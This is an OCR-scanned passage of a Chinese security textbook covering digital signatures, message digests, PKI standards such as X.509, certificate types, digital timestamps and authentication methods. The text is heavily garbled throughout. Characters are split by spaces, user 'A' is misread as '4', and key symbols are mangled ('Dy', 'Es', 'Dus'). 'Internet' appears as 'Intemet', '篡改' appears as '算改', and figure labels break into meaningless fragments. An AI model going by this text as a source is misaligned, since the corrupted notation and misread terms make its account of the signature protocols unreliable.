公开 密 钥 算法 的 数字 签名 


使 用 公开 密 钥 算法 的 数字 签名 其 加 密 算 法 和 解密 算法 除了 要 满足 D(E(P))=P 外 ， 还 必 
须 满足 E(D(P)) =P 。 数 字 签名 的 过 程 如 图 2.9 所 示 ， 当 用 户 4 想 向 用 户 B 发 送 签名 的 报 


文 了 时 ,， 定 


向 B 发 送 Es(Da(P))， 由 于 4 知道 自己 的 私人 密 钥 Dy 和 B 的 公开 密 钥 Es， 因 


而 这 是 可 能 的 ，B 收 到 密 文 后 ， 先 用 私人 密 钥 Ds 解 开 密 文 ， 将 D4(P) 复 制 一 份 放 于 安全 的 
地 方 ， 然 后 用 4 的 公开 密 钥 囊 将 Ds(P) 解 开 ， 取出 了， 如 图 2.9 所 示 。 

当 4 过 后 试图 否认 给 B 发 过 P 了 时 ，B 可 以 出 示 Dx(P) 作 为 证 据 ， 因 为 B 没 有 4 的 私人 
密 钥 D4， 除 非 4 确实 发 过 D4(P)， 否 则 B 是 不 会 有 这 样 一 份 密 文 的 ， 只 要 用 4 的 公开 密 钥 
瓦解 开 Dus(P), 就 可 以 知道 B 说 的 是 真 话 。 
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Da (P) EaDa (P) Dai) 


图 2.9 使 用 公开 密 钥 的 数字 签名 


3. 使 用 报 文 摘要 的 数字 签名 

以 上 的 签名 方法 将 认证 和 保密 两 种 截然 不 同 的 功能 混在 了 一 起 ， 有 些 报 文 只 需要 签名 
而 不 需要 保密 。 为 此 有 人 提出 一 个 新 的 方案 ， 使 用 一 个 单 向 Hash 函数 ， 将 任意 长 的 明文 
转换 成 一 个 固定 长 度 的 数据 串 ， 然 后 仅 对 该 数据 串 进行 加 密 。 这 样 的 Hash 函数 通常 称 为 
报 文摘 要 (Message Digests，MD)， 它 必须 满足 以 下 3 个 条 件 ，Q@ 给 定 P 就 很 容易 计算 出 
MD(P); 名 只 给 出 MD(P)， 很 难 计算 出 了;，@ 无 法 生成 两 个 具有 相同 报 文摘 要 的 报 文 。 

为 满足 第 3 个 条 件 ，MD(P) 至 少 必须 达到 128 比特 ， 实 际 上 有 很 多 函数 符合 以 上 3 个 
条 件 。 考 虑 图 2.10 的 例子 ，CA 解 开 密 文 后 ， 首 先 计算 出 MD(P)， 然 后 着 手 组 织 一 个 新 的 
密 文 ， 在 新 的 密 文中 它 不 是 发 送 Kca(4,4P)， 而 是 发 送 Kca(4,tMD(P))， 而 B 解 开 密 文 后 将 
Kca(4,t,MD(P)) 保 存 起 来 。 如 果 发 生 纠纷 ，B 可 以 出 示 P 和 Kca(4,tMD(P)) 作 为 证 据 。 因 为 
Kca(4,t,MD(P)) 是 由 CA 送 来 的 ，B 无 法 伪造 ， 当 CA 用 Kca 解 开 密 文 取出 MD(P) 后 ， 可 将 
Hash 函数 作用 于 B 提供 的 明文 P， 然 后 判断 报 文摘 要 是 否 和 MD(P) 相 同 。 因 为 条 件 @@ 保 证 
了 不 可 能 伪造 出 另 一 个 报 文 ， 使 得 其 报 文摘 要 同 MD(P) 一 样 ， 因 此 只 要 两 个 报 文摘 要 相 
同 ， 就 证 明了 B 确实 收 到 了 P。 

在 公开 密 钥 密码 系统 中 ， 使 用 报 文 摘要 进行 数字 签名 的 过 程 如 图 2.10 所 示 。 首 先 用 户 4 
对 明文 P 计算 出 MD(P)， 然 后 用 私人 密 钥 对 MD(P) 进 行 加 密 ， 连 同 明文 P 一 起 发 送 给 用 户 
B; B 将 DaA(MD(P)) 复 制 一 份 放 于 安全 的 地 方 ， 然 后 用 4 的 公开 密 钥 解 开 密 文 取出 MD(P)， 
为 防止 途中 有 人 更 换 报 文 P，B 对 P 进行 报 文摘 要 ， 如 结果 与 MD(P) 相 同 ， 则 将 P 接收 下 
来 。 当 B 试 图 否认 发 送 过 P 卫 时 ，B 可 以 出 示 P 了 和 Da(MD(P)) 来 证 明 自 己 确实 收 到 过 P。 


有 上 户 4 P, BAMD(P)) 用 户 B 


图 2.10 使 用 报 文摘 要 的 数字 签名 


以 上 就 是 实现 数字 签名 的 方法 ， 在 这 几 种 方法 中 ， 使 用 公开 密 钥 的 数字 签名 应 用 最 
广 ， 通 常 说 的 数字 签名 就 是 指使 用 公开 密 钥 的 数字 签名 。 


2.3.4 公 钥 基础 设施 (PKD) 


1. PKI 概述 
使 用 数字 签名 的 前 提 就 是 要 保证 公 钥 和 公 钥 持 有 人 之 间 的 对 应 关系 ， 即 如 何 确认 某 个 
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人 是 否 真正 拥有 公 钥 (及 对 应 的 私 钥 )。 为 解决 这 个 问题 ， 世 界 各 国 对 其 进行 了 多 年 的 研 
究 ， 初 步 形 成 了 一 套 完整 的 Intemet 安全 解决 方案 ， 即 目前 被 广泛 采用 的 PKI(Public Key 
Infrastrmucture， 公 钥 基 础 设施 ) 技 术 ， 该 技术 采用 证 书 管理 公 钥 ， 通 过 第 三 方 的 可 信任 机 构 
一 一 认证 中 心 CA， 把 用 户 的 公 钥 和 其 他 标识 信息 (如 名 称 、E-mail、 身 份 证 号 等 ) 捆 绑 在 一 
起 ， 在 Intemet 上 验证 用 户 的 身份 。 目 前 ， 通 用 的 办 法 是 采用 基于 PKI 结构 结合 数字 证 
书 ， 通 过 把 要 传输 的 数字 信息 进行 加 密 ， 保 证 信息 传输 的 保密 性 、 完 整 性 ， 签 名 保证 身份 
的 真实 性 和 抗 抵赖 性 。 

PKI 是 一 个 利用 非 对 称 密码 算法 ( 即 公开 密 钥 算法 ) 原 理 和 技术 实现 并 提供 网 络 安全 服 
务 的 通用 安全 基础 设施 ， 它 遵循 标准 的 公 钥 加 密 技术 ， 为 电子 商务 、 电 子 政务 、 网 上 银行 
和 网 上 证 券 业 ， 提 供 一 整套 安全 保证 的 基础 平台 。PKI 这 种 遵循 标准 的 密 钥 管理 平台 ， 能 
够 为 所 有 网 上 应 用 提供 加 、 解 密 和 数字 签名 等 安全 服务 所 需要 的 密 钥 和 证 书 管理 。 

2. 与 PKI 相关 的 标准 

PKI 的 核心 执行 机 构 是 认证 机 构 CA， 其 核心 元 素 是 数字 证 书 。 与 PKI 相关 的 标准 包 
括 以 下 内 容 。 

1) X.209(1988) ASN.1 基本 编码 规则 的 规范 

ASN.1 用 于 描述 网 络 上 传输 信息 的 格式 。 它 包含 两 个 部 分 ， 第 一 部 分 (ISO 8824/ITU 
X.208) 描 述 信息 内 的 数据 、 数 据 类 型 及 序列 格式 ， 也 就 是 数据 的 语法 ; 第 二 部 分 (ISO 
8825/ITTU X.209) 描 述 如 何 将 各 部 分 数据 组 成 消息 ， 也 就 是 数据 的 基本 编码 规则 。ASN.1 原 
来 是 作为 X.409 的 一 部 分 而 开发 的 ， 后 来 独立 地 成 为 一 个 标准 。 这 两 个 协议 除了 在 PKI 体 
系 中 被 应 用 外 ， 还 被 广泛 应 用 于 通信 和 计算 机 等 其 他 领域 。 

2) X.500(1993) 信 息 技 术 (开放 系统 互联 ) 的 概念 、 模 型 及 服务 简 述 

X.500 是 一 套 已 经 被 国际 标准 化 组 织 (ISO) 接 受 的 目录 服务 系统 标准 ， 它 定义 了 一 个 机 
构 如 何在 全 局 范围 内 共享 其 名 字 和 与 之 相关 的 对 象 。X.500 是 层次 性 的 ， 其 中 的 管理 性 域 
(机 构 、 分 支 、 部 门 和 工作 组 ) 可 以 提供 这 些 域内 的 用 户 和 资源 信息 。 在 PKI 体系 中 ，X.500 
被 用 来 唯一 标识 一 个 实体 ， 该 实体 可 以 是 机 构 、 组 织 、 个 人 或 一 台 服 务 器 。X.500 被 认为 
是 实现 目录 服务 的 最 佳 途径 ， 但 X.500 的 实现 需要 较 大 的 投资 ， 并 且 比 其 他 方式 速度 慢 ; 
而 其 优势 则 在 于 具有 信息 模型 、 多 功能 和 开放 性 。 

3) X.509(1993) 信 息 技术 (开放 系统 互联 ) 的 鉴别 框架 

X.509 是 由 国际 电信 联盟 (GTU-T) 制 定 的 数字 证 书 标准 。 在 X.500 确保 用 户 名 称 唯一 性 
的 基础 上 ，X.509 为 X.500 用 户 名 称 提供 通信 实体 的 鉴别 机 制 ， 并 规定 实体 鉴别 过 程 中 广 
泛 适 用 的 证 书 语法 和 数据 接口 。 

X.509 证 书 由 用 户 公 共 密 钥 和 用 户 标识 符 组 成 ， 此 外 还 包括 版 本 号 、 证 书 序 列 号 、CA 
标识 符 、 签 名 算法 标识 、 签 发 者 名 称 以 及 证 书 有 效 期 等 信息 。 这 一 标准 的 最 新 版 本 是 
X.509 v3。 


2.3.5 ”数字 证 书 


数字 证 书简 称 证 书 ， 是 PKI 的 核心 元 素 ， 由 认证 机 构 服务 器 签发 ， 它 是 数字 签名 的 技 
术 基 础 保障 ， 符 合 和 509 标准 ， 能 够 证 明 某 一 实体 的 身份 以 及 其 公 钥 的 合法 性 及 该 实体 与 
公 钥 二 者 之 间 的 匹配 关系 。 证 书 是 公 钥 的 载体 ， 证 书 上 的 公 钥 唯一 ， 与 实体 身份 唯一 绑 
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定 。 现 行 的 PKI 机 制 一 般 为 双 证 书 机 制 ， 即 一 个 实体 应 具有 两 个 证 书 ， 两 个 密 钥 对 ， 一 个 
是 加 密 证 书 ， 一 个 是 签名 证 书 ， 加 密 证 书 原则 上 是 不 能 用 于 签名 的 。 


1. 数字 证 书 的 内 容 


证 书 在 公 钥 体制 中 是 密 钥 管 理 的 介质 ， 不 同 的 实体 可 通过 证 书 来 互相 传递 公 铀 ， 证 书 


由 具有 权威 性 、 可 信任 性 和 公正 性 的 第 三 方 机 构 签发 ， 是 权威 性 电子 文档 。 证 书 的 主要 内 


容 按 X.509 标准 规定 其 逻辑 表达 式 为 


CA 《A》 =CA{V,SN,ALCA,UCA,A,UA,Ap,Ta} 


V: 证 书 版 本 号 。 


SN: 证 书 序列 号 。 

AI: 用 于 对 证 书 进行 签名 的 算法 标识 。 
CA: 签发 证 书 的 CA 机 构 的 名 字 。 
UCA: 签发 证 书 的 CA 的 唯一 标识 符 。 
A: 用 户 A 的 名 字 。 

UA: 用 户 A 的 唯一 标识 。 

Ap: 用 户 A 的 公 钥 。 


其 中 各 部 分 的 含义 说 明 如 下 。 
CA《A》: 认证 机 构 CA 为 用 户 A 颁发 的 证 书 。 
CA{,,,}: 认证 机 构 CA 对 花 插 弧 内 证 书 内 容 进行 数字 签名 。 


@ Ta: 证书 的 有 效 期 。 


证 书 的 这 些 内 容 主 要 用 


于 身份 认证 、 签 名 验证 和 有 效 期 检查 。CA 签发 证 书 时 要 对 上 


述 内容 进 行 签名 ， 以 示 对 所 签发 证 书 内 容 的 完整 性 、 准 确 性 负责 ， 并 证 明 该 证 书 的 合法 性 
和 有 效 性 ， 最 后 将 网 上 身份 与 证 书 绑 定 。CA 对 实体 签发 证 书 的 过 程 如 图 2.11 所 示 。 


序列 号 


颁发 者 识别 名 


六 


此 地 
伟 
ba 3 
坦 


主体 唯一 识别 名 


密 钥 证 书 用 途 


扩展 域 


CA 签名 


图 2.11 CA 对 实体 签发 证 书 的 过 程 
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CA 颁发 的 上 述 证 书 与 对 应 的 私 钥 存放 在 一 个 保密 文件 里 ， 最 好 的 办 法 是 存放 在 IC 卡 
和 USBKey 介质 中 ， 可 以 保证 私 钥 不 出 卡 ( 所 有 和 私 钥 相关 的 密码 操作 均 在 卡 内 完成 ， 充 
分 保证 根 密 钥 的 安全 )， 证 书 不 能 被 复制 ， 安 全 性 高 、 携 带 方便 、 便 于 管理 。 

2. 数字 证 书 的 分 类 


前 ， 数 字 证 书 可 用 于 电子 邮件 、 电 子 贸易 、 电 子 基金 转移 等 各 种 用 途 。 数 字 证 书 的 
应 用 范围 和 效果 目前 还 是 有 限 的 。 数 字 证 书 通常 分 为 个 人 证 书 、 企 业 证 书 、 软 件 证 书 。 

(1) 个 人 证 书 (Personal Digital ID) 是 为 某 个 用 户 提 供 的 证 书 ， 以 帮助 个 人 在 网 上 安全 地 
进行 电子 交易 操作 。 个 人 身份 的 数字 证 书 通常 是 安装 在 客户 端的 浏览 器 内 ， 并 通过 安全 的 
电子 邮件 进行 交易 操作 。 网 景 公司 的 “导航 者 ”(Navigator) 浏 览 器 和 微软 公司 的 “探索 
者 ”浏览 器 (Intemet Explorer) 都 支持 该 功能 。 个 人 数字 证 书 是 通过 浏览 器 来 申请 获得 的 ， 
认证 中 心 对 申请 者 的 电子 邮件 地 址 、 个 人 身份 证 及 信用 卡号 等 进行 核实 后 ， 就 发 放 个 人 数 
字 证 书 ， 并 将 数字 证 书 安置 在 用 户 所 用 的 浏览 器 或 电子 邮件 的 应 用 系统 中 ， 同 时 也 给 申请 
者 发 一 个 通知 。 个 人 数字 证 书 的 使 用 方法 是 集成 在 用 户 的 浏览 器 的 相关 功能 中 ， 用 户 其 实 
只 要 作出 相应 的 选择 即 可 。 

(2) 企业 证 书 ， 也 就 是 服务 器 证 书 (Server ID)， 它 对 网 上 的 服务 器 提供 一 个 证 书 ， 拥 有 
Web 服务 器 的 企业 就 可 以 用 具有 证 书 的 Internet 网 站 (Web Site) 进 行 安全 电子 交易 。 拥 有 数 
字 证 书 的 服务 器 可 以 自动 与 客户 进行 加 密 通信 ， 有 证 书 的 Web 服务 器 会 自动 地 将 其 与 客户 
端 Web 浏览 器 通信 的 信息 加 密 。 服 务 器 的 拥有 者 (相关 的 企业 或 组 织 ) 有 了 证 书 ， 即 可 进行 
安全 电子 交易 。 

肛 务 器 证 书 的 发 放 较为 复杂 。 因 为 服务 器 证 书 是 一 个 企业 在 网 络 上 的 形象 ， 是 企业 在 
网 络 空间 信任 度 的 体现 。 权 威 的 认证 中 心 对 每 一 个 申请 者 都 要 进行 信用 调查 ， 包 括 企业 基 
本 情况 、 营 业 执照 、 纳 税 证 明 等 。 要 考核 该 企业 对 服务 器 的 管理 情况 ， 一 般 是 通过 事先 准 
备 好 的 详细 验证 步骤 逐步 进行 ， 如 是 否 有 一 套 完善 的 管理 规范 、 是 否 有 完善 的 加 密 技术 和 
保密 措施 以 及 是 否 有 多 层 逻 辑 访问 控制 、 生 物 统计 扫描 仪 、 红 外 线 监视 器 等 ， 认 证 中 心经 
过 考察 后 决定 是 否 发 放 或 撤销 服务 器 数字 证 书 。 一 旦 决定 发 放 后 ， 该 服务 器 就 可 以 安装 认 
证 中 心 提供 的 服务 器 证 书 ， 安 装 成 功 后 即 可 投入 服务 。 服 务 器 得 到 数字 证 书后 ， 就 会 有 一 
对 密 钥 ， 它 与 服务 器 是 密 不 可 分 的 ， 数 字 证 书 与 这 对 密 钥 一 起 表示 该 服务 器 的 身份 ， 是 整 
个 认证 的 核心 。 

(3) 软件 (开发 者 ) 证 书 (Developer ID) 通 常 为 mnternet 中 被 下 载 的 软件 提供 证 书 ， 该 证 书 
用 于 和 微软 公司 Authenticode 技术 (合法 化 软化 ) 结 合 的 软件 ， 以 使 用 户 在 下 载 软件 时 能 获 
得 所 需 的 信息 。 

上 述 三 类 证 书 中 前 两 类 是 常用 的 证 书 ， 第 三 类 则 用 于 较 特 殊 的 场合 ， 大 部 分 认证 中 心 
提供 前 两 类 证 书 ， 能 完全 提供 各 类 证 书 的 认证 中 心 并 不 普遍 。 

数字 证 书 的 管理 包括 两 方面 内 容 ， 一 是 颁发 数字 证 书 ， 二 是 撤销 数字 证 书 。 在 一 些 情 
况 下 ， 如 密 钥 丢失 或 被 窃 或 者 某 个 服务 器 变更 ， 就 需要 一 种 方法 来 验证 数字 证 书 的 有 效 
性 ， 要 建立 一 份 证 书 取消 清单 并 公 诸 于 众 ， 这 份 清单 是 可 伸缩 的 。 由 于 数字 证 书 也 要 有 相应 
的 有 效 期 。 为 此 ， 认 证 中 心 一 般 都 制订 相应 的 管理 措施 和 政策 ， 来 管理 其 属 下 的 数字 证 书 。 


了 J 
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2.3.6 ”数字 时 间 戳 技术 


数字 时 间 戳 技术 是 数字 签名 技术 中 一 种 变相 的 应 用 。 在 书面 合同 中 ， 文 件 签署 的 日 
和 签名 同样 是 防止 文件 被 伪造 和 自 改 的 关键 性 内 容 。 数 字 时 间 戳 服务 (Digital Time-Stamp 
Service，DTS) 是 网 上 电子 商务 安全 服务 项 目 之 一 ， 能 提供 电子 文件 的 日 期 和 时 间 信 息 的 安 
全 保护 。 
计 间 戳 (Time-Stamp) 是 一 个 经 加 密 后 形成 的 凭证 文档 ， 它 包括 三 个 部 分 : 四 需 加 时 间 
戳 的 文件 摘要 (Digesb; @DTS 收 到 文件 的 日 期 和 时 间 ; DTS 的 数字 签名 。 
户 首 先 将 需要 加 时 间 戳 的 文件 用 Hash 函数 加 密 形成 摘要 ， 然 后 将 该 摘要 发 送 到 
DTS，DTS 在 加 入 了 收 到 文件 摘要 的 日 期 和 时 间 信 息 后 再 对 该 文件 加 密 (数字 签名 )， 然 后 
送 回 用 户 。 书 面 签 署 文件 的 时 间 是 由 签署 人 自己 写 上 的 ， 而 数字 时 间 戳 则 不 然 ， 它 是 由 认 
证 单位 DTS 来 加 的 ， 以 DTS 收 到 文件 的 时 间 为 依据 。 


24 认证 技术 


在 网 络 系统 中 ， 安 全 目标 的 实现 除了 采用 加 密 技术 外 ， 另 一 个 重要 方面 就 是 认证 技 
术 。 认 证 技术 的 主要 作用 是 进行 信息 认证 。 信 息 认证 的 目的 ， 一 是 确认 信息 发 送 者 的 身 
份 ， 二 是 验证 信息 的 完整 性 ， 即 确认 信息 在 传送 或 存储 过 程 中 未 被 算 改 过 。 常 用 的 安全 认 
证 技术 主要 有 数字 摘要 、 数 字 信 封 、 数 字 签名 、 数 字 时 间 戳 、 数 字 证 书 和 安全 认证 机 构 等 。 
认证 是 防止 主动 攻击 的 重要 技术 ， 它 对 于 开放 环境 中 的 各 种 信息 系统 的 安全 有 重要 作用 。 

认证 技术 一 般 可 以 分 为 以 下 两 种 : 四 身份 认证 ， 用 于 鉴别 用 户 身份 ， 包 括 识别 ( 即 明确 并 
区 分 访问 者 的 身份 ) 和 验证 ( 即 对 访问 者 声称 的 身份 进行 确认 );，@ 消 息 认证 ， 用 于 保证 信息 的 
完整 性 和 抗 否认 性 ， 在 很 多 情况 下 ， 用 户 要 确认 网 上 信息 是 不 是 假 的 ， 信 息 是 否 被 第 三 方 修 
改 或 伪造 ， 这 就 需要 消息 认证 。 消 息 认证 的 有 关内 容 参 见 加 密 、 解 密 部 分 和 数字 签名 部 分 。 


2.4.1 身份 认证 的 重要 性 
有 这 样 一 个 经 典 的 漫画 ， 一 条 狗 在 计算 机 面前 一 边 打字 ， 一 边 对 另 一 条 狗 说 : “在 


JIntemet 上 ， 没 有 人 知道 你 是 一 个 人 还 是 一 条 狗 ! ”这 个 漫画 说 明了 在 Intemet 上 很 难 识别 
身份 。 身 份 认证 是 安全 系统 中 的 第 一 道 关卡 ， 如 图 2.12 所 示 。 


安全 管理 员 一 一 一 一 一 >| 授权 数据 库 


身份 认证 | 访问 控制 


用 户 


图 2.12 安全 系统 的 逻辑 结构 
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户 在 访问 安全 系统 之 前 ， 


首先 经 过 身份 认证 系统 识别 身份 ， 然 后 访问 监控 器 ， 根 据 


用 户 的 身份 和 授权 数据 库 决 定 用 


户 是 否 能 够 访问 某 个 资源 。 授 权 数 据 库 由 安全 管理 员 按照 


非 实 时 地 是 否 有 入 侵 行为 。 


需要 进行 配置 。 Re 


访问 控制 和 审计 系统 都 要 依赖 于 身份 认证 系统 提供 的 “ 信 


息 ”， 即 用 户 的 身份 。 可 见 身份 认证 在 安全 系统 中 的 地 位 极其 重要 ， 是 最 基本 的 安全 服 
务 ， 其 他 的 安全 服务 都 要 依赖 于 它 。 一 旦 身份 认证 系统 被 攻破 ， 那 么 系统 的 所 有 安全 措施 
将 形同虚设 。 黑 客 攻击 的 目标 往往 就 是 身份 认证 系统 。 


2.4.2 ”身份 认证 的 方式 


lj 户 与 主机 之 间 的 认证 可 以 基于 以 下 一 个 或 几 个 因素 。 


@ ”用 户 所 知道 的 东西 ， 如 口令 。 
@ ”用 户 拥 有 的 东西 ， 如 智能 
@ ”用 户 所 具有 的 生物 特征 ， 如 指纹 、 声 音 、 视 网 膜 扫 描 等 。 


1. 基于 口令 的 认证 方式 


基于 口令 的 认证 方式 是 最 常用 的 一 种 技术 ， 但 因为 它 是 一 种 单 因素 的 认证 ， 安 全 性 仅 
依赖 于 口令 ,口令 一 旦 泄露 ， 用 户 即 可 被 冒充 。 更 严重 的 是 用 户 往往 选择 简单 、 易 被 猜测 


的 口令 ， 如 与 用 户 名 相同 的 口令 、 生 日 、 单 词 等 ， 此 问题 往往 成 为 安全 系统 最 薄弱 的 突破 
。 口 令 大 都 经 过 加 密 后 存放 在 口令 文件 中 ， 一 旦 口令 文件 被 窃取 ， 那 么 就 可 以 进行 离线 
的 字典 式 攻击 ， 这 也 是 黑客 最 常用 的 手段 之 一 。 为 了 使 口令 更 加 安全 ， 可 以 通过 加 密 口 


令 ， 或 修改 加 密 方法 来 提供 更 复杂 的 口令 ， 这 就 是 一 次 性 口令 方案 。 


2. 基于 智能 卡 的 认证 方式 
智能 卡 具 有 硬件 加 密 功 能 ， 


有 较 高 的 安全 性 。 每 个 用 户 持 有 一 张 智 能 卡 ， 智 能 卡 存储 


用 户 个 性 化 的 秘密 信息 ， 同 时 在 验证 服务 器 中 也 存放 该 秘密 信息 。 进 行 认证 时 ， 用 户 输入 


PIN( 个 人 身份 识别 码 )， 智 能 卡 认 证 PIN 成 功 后 ， 即 可 读 出 智能 卡 中 的 秘密 信息 ， 进 而 利用 


该 秘密 信息 与 主机 之 间 进 行 认证 。 基 于 智能 卡 的 认证 方式 是 一 种 双 因素 的 认证 方式 (PIN 十 
智能 卡 )， 即 使 PIN 或 智能 卡 被 窃取 ， 用 户 仍 不 会 被 冒充 。 智 能 卡 提供 硬件 保护 措施 和 加 
密 算法 ， 可 以 利用 这 些 功能 加 强 安全 性 能 。 例 如 ， 可 以 把 智能 卡 设置 成 用 户 只 能 得 到 加 密 
后 的 某 个 秘密 信息 ， 从 而 防止 秘密 信息 的 泄露 。 


3. 基于 生物 特征 的 认证 方式 


这 种 认证 方式 利用 人 体 唯一 


的 、 可 靠 的 、 稳 定 的 生物 特征 (如 指纹 、 虹 膜 、 脸 部 、 掌 纹 


等 )， 采 用 计算 机 的 强大 功能 和 网 络 技术 进行 图 像 处 理 和 模式 识别 。 该 技术 具有 很 强 的 安全 
性 和 可 靠 性 ， 与 传统 的 身份 确认 手段 相 比 ， 无 疑 产 生 了 质 的 飞跃 。 近 几 年 来 ， 全 球 的 生物 


识别 技术 已 从 研究 阶段 转向 应 上 


阶段 ， 前 景 十 分 广阔 。 


生物 识别 技术 主要 有 以 下 几 种 : @D 指 纹 识 别 技术 ， 每 个 人 的 指纹 皮肤 纹路 都 是 唯一 
的 ， 并 且 终 身 不 变 ， 通 过 将 指纹 和 预先 保存 在 数据 库 中 的 指纹 采用 指纹 识别 算法 进行 比 
对 ， 便 可 验证 真实 身份 ，@ 视 网 膜 识别 技术 ， 这 种 技术 利用 激光 照射 眼球 的 背面 ， 扫 描 摄 
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取 几 百 个 视网膜 的 特征 点 ， 经 数字 化 处 理 后 形成 记忆 模板 存储 于 数据 库 中 ， 供 以 后 进行 比 
对 验证 ， 视 网 膜 是 一 种 极其 稳定 的 生物 特征 ， 属 于 精确 度 较 高 的 识别 技术 ; @ 声 音 识别 技 
术 ， 这 是 一 种 行为 识别 技术 ， 用 声音 录入 设备 反复 不 断 地 测量 、 记 录 声 音波 形变 化 ， 进 行 
频谱 分 析 ， 经 数字 化 处 理 后 做 成 声音 模板 加 以 存储 。 使 用 时 将 现场 采集 到 的 声音 同 登记 过 
的 声音 模板 进行 精确 匹配 ， 以 识别 身份 。 


2.4.3 ”消息 认证 


消息 认证 的 内 容 包 括 以 下 几 个 方面 。 

@ ”证 实 消息 的 信 源 和 信 宿 。 

@ 消息 内 容 是 否 受 到 偶然 或 有 意 的 自 改 。 

@ 消息 的 序号 和 时 间 性 。 

对 一 个 电子 文件 进行 数字 签名 并 在 网 上 传输 ， 首 先 要 在 网 上 进行 身份 认证 ， 然 后 再 进 
行 签 名 ， 最 后 是 对 签名 的 验证 。 

1. 认证 

PKI 提供 的 服务 首先 是 认证 ， 即 身份 识别 ， 确 认 实 体 即 为 自己 所 声明 的 实体 。 认 证 的 
前 提 是 甲乙 双方 都 具有 第 三 方 CA 所 签发 的 证 书 ， 认 证 分 单 向 认证 和 双向 认证 。 

(1) 单 向 认证 是 甲乙 双方 在 网 上 通信 时 ， 甲 只 需要 认证 乙 的 身份 即 可 。 这 时 甲 需 要 获 
取 乙 的 证 书 ， 获 取 的 方式 有 两 种 ， 一 种 是 在 通信 时 乙 直 接 将 证 书 传送 给 甲 ， 另 一 种 是 甲 向 
CA 目录 服务 器 索取 。 甲 获得 乙 的 证 书后 ， 首 先 用 CA 的 根 证 书 公 钥 验 证 该 证 书 的 签名 ， 
验证 通过 说 明 该 证 书 是 有 效 证 书 ， 然 后 检查 证 书 的 有 效 期 以 及 该 证 书 是 否 已 作废 (LRC 检 
查 ) 而 进入 黑 名 单 。 

(2) 双向 认证 。 双 向 认证 是 甲乙 双方 在 网 上 通信 时 ， 用 户 甲 不 但 要 认证 用 户 乙 的 身 
份 ， 乙 也 要 认证 甲 的 身份 。 其 认证 过 程 与 单 向 认证 过 程 相同 ， 如 图 2.13 所 示 。 甲 乙 双 方 在 
网 上 查询 对 方 证 书 的 有 效 性 及 黑 名 单 时 ， 采 用 的 是 LDAP(Light Directory Access Protocol) 
协议 ， 这 是 一 种 轻型 目录 访问 协议 。 


HR 
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图 2.13 ”双向 认证 过 程 
2. 数字 签名 与 验证 过 程 


网 上 通信 的 双方 ， 在 互相 认证 身份 后 ， 即 可 发 送 签名 的 数据 电文 。 数 字 签 名 与 验证 过 
程 和 技术 实现 的 原理 如 图 2.14 所 示 。 
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2.14 ”数字 签名 与 验证 过 程 


数字 签名 过 程 分 为 两 个 部 分 : 在 图 2.14 中 ， 左 侧 为 签名 过 程 ， 右 侧 为 验证 过 程 。 即 发 
送 方 将 原文 用 Hash 算法 求 得 数字 摘要 ， 用 签名 私 钥 对 数字 摘要 加 密 形成 数字 签名 ， 发 送 
方 将 原文 与 数字 签名 一 起 发 送 给 接收 方 ， 接收 方 验 证 签名 ， 即 用 发 送 方 公 钥 解密 数字 签 
名 ， 获 得 数字 摘要 ;然后 将 原文 采用 同样 的 Hash 算法 又 得 一 新 的 数字 摘要 ， 将 两 个 数字 


摘要 进行 比较 ， 如 果 二 者 匹配 ， 说 明 经 数字 签名 的 电子 文件 传输 成 功 。 
3. 数字 签名 的 操作 过 程 


数字 签名 的 操作 过 程 如 图 2.15 所 示 ， 它 需要 有 发 送 方 的 签名 证 书 的 私 钥 及 其 验证 公 钥 。 


数字 签名 操作 具体 过 程 如 下 : 首先 生成 被 签名 的 电子 文件 ， 然 后 对 电子 文件 用 


Hash 


算法 得 到 数字 摘要 ， 再 对 数字 摘要 用 签名 私 钥 进行 非 对 称 加 密 ， 即 制作 数字 签名 ;然后 将 
以 上 的 签名 和 电子 文件 原文 以 及 签名 证 书 的 公 钥 加 在 一 起 进行 封装 ， 形 成 签名 结果 发 送 给 


接收 方 ， 等 待 接收 方 验证 。 


图 2.15 数字 签名 操作 过 程 


(a8). 
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4. 数字 签名 的 验证 过 程 

接收 方 收 到 发 送 方 的 签名 结果 后 进行 签名 验证 ， 其 具体 操作 过 程 如 图 2.16 所 示 。 

接收 方 收 到 数字 签名 的 结果 ， 其 中 包括 数字 签名 、 电 子 原文 和 发 送 方 公 铀 ， 即 待 验证 
的 数据 。 接 收 方 进行 签名 验证 。 验 证 过 程 是 : 接收 方 首先 用 发 送 方 公 钥 解密 数字 签名 ， 导 
出 数字 摘要 ， 并 对 电子 文件 原文 做 同样 的 Hash 算法 得 出 一 个 新 的 数字 摘要 ， 将 两 个 摘要 
的 Hash 值 进行 结果 比较 ， 相 同 签名 得 到 验证 ， 否 则 无 效 。 这 就 做 到 了 《电子 签名 法 》 中 
所 要 求 的 对 签名 不 能 改动 ， 对 签署 的 内 容 和 形式 也 不 能 改动 的 要 求 。 

公 和 钥 加 密 


待 验 证 的 


签名 结果 


Hash 运算 
图 2.16 数字 签名 验证 过 程 


5. 数字 签名 的 作用 
如 果 接 收 方 对 发 送 方 数字 签名 验证 成 功 ， 就 可 以 说 明 以 下 3 个 实质 性 的 问题 。 
(1) 该 电子 文件 确实 是 由 签名 者 即 发 送 方 所 发 出 的 ， 因 为 签署 时 电子 签名 数据 由 电子 


签名 人 所 控制 。 
(2) 被 签名 的 电子 文件 确实 是 经 发 送 方 签名 后 发 送 的， 说 明 发 送 方 用 自己 的 私 钥 做 的 


签名 ， 并 得 到 验证 。 
(3) 接收 方 收 到 的 电子 文件 在 传输 中 没有 被 算 改 ， 保 持 了 数据 的 完整 性 ， 因 为 签署 后 


对 电子 签名 的 任何 改动 都 能 够 被 发 现 。 

6. 原文 保密 的 数字 签名 的 实现 方法 

在 上 述 数 字 签名 原理 中 定义 的 是 对 原文 做 数字 摘要 和 签名 并 传输 原文 ， 在 很 多 场合 传 
输 的 原文 是 要 求 保密 的 ， 这 就 要 涉及 “数字 信封 ”的 概念 。 数 字 信封 的 功能 类 似 于 普通 信 
封 。 普 通信 封 在 法 律 的 约束 下 保证 只 有 收 信人 才能 阅读 信 的 内 容 ; 数字 信封 则 采用 密码 技 
术 保 证 了 只 有 规定 的 接收 入 才能 阅读 信息 的 内 容 。 

数字 信封 中 采用 单 钥 密码 体制 和 公 钥 密码 体制 。 信 息 发 送 者 首先 利用 随机 产生 的 对 称 


.he 
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密码 加 密 信息 ， 再 利用 接收 方 的 公 钥 加 密 对 称 密码 ， 被 公 钥 加 密 后 的 对 称 密码 称 为 数字 信 
封 。 在 传递 信息 时 ， 信 息 接 收 方 要 解密 信息 时 ， 必 须 先 用 自己 的 私 钥 解密 数字 信封 ， 得 到 
